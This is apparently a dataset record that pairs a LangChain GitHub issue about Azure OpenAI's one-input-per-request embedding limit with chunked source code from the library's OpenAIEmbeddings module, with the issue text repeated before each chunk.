The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
import numpy as np
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | import openai
min_seconds = 4
max_seconds = 10
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | import openai
min_seconds = 4
max_seconds = 10
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
def _check_response(response: dict, skip_empty: bool = False) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
import openai
raise openai.error.APIError("OpenAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return await _async_embed_with_retry(**kwargs)
class OpenAIEmbeddings(BaseModel, Embeddings): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | """OpenAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key or pass it
as a named parameter to the constructor.
Example:
.. code-block:: python
from langchain.embeddings import OpenAIEmbeddings
openai = OpenAIEmbeddings(openai_api_key="my-api-key")
In order to use the library with Microsoft Azure endpoints, you need to set
the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
the properties of your endpoint. |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | In addition, the deployment name must be passed as the model parameter.
Example:
.. code-block:: python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"
from langchain.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings(
deployment="your-embeddings-deployment-name",
model="your-embeddings-model-name",
openai_api_base="https://your-endpoint.openai.azure.com/",
openai_api_type="azure",
)
text = "This is a test query."
query_result = embeddings.embed_query(text)
"""
client: Any = None
model: str = "text-embedding-ada-002"
deployment: str = model
openai_api_version: Optional[str] = None
openai_api_base: Optional[str] = None
openai_api_type: Optional[str] = None
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191 |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | """The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the OpenAPI request."""
headers: Any = None
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
skip_empty: bool = False
"""Whether to skip empty strings when embedding or raise an error.
Defaults to not skipping."""
class Config: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | """Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | """Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | "OPENAI_PROXY",
default="",
)
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
default_api_version = "2022-12-01"
else:
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_api_type in ("azure", "azure_ad", "azuread"):
openai_args["engine"] = self.deployment
if self.openai_proxy:
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
}
return openai_args
def _get_len_safe_embeddings( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
